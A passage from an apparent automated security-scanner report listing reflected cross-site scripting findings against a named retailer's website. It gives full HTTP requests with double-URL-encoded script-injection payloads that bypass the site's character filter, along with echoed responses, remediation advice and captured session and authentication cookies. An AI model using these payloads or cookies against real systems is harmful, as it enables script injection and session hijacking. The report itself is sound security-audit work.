Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:57 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichb33a1";alert(1)//8c3c0427d0e/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.128. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c6d1%2522%253balert%25281%2529%252f%252fc5eabbb08ea was submitted in the REST URL parameter 3. This input was echoed as 1c6d1";alert(1)//c5eabbb08ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest1c6d1%2522%253balert%25281%2529%252f%252fc5eabbb08ea/life-science/zinc-finger-nuclease-technology/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest1c6d1";alert(1)//c5eabbb08ea/life-science/zinc-finger-nuclease-technology/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.129. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 648e3%2522%253balert%25281%2529%252f%252f8a4b807a60d was submitted in the REST URL parameter 4. This input was echoed as 648e3";alert(1)//8a4b807a60d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science648e3%2522%253balert%25281%2529%252f%252f8a4b807a60d/zinc-finger-nuclease-technology/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d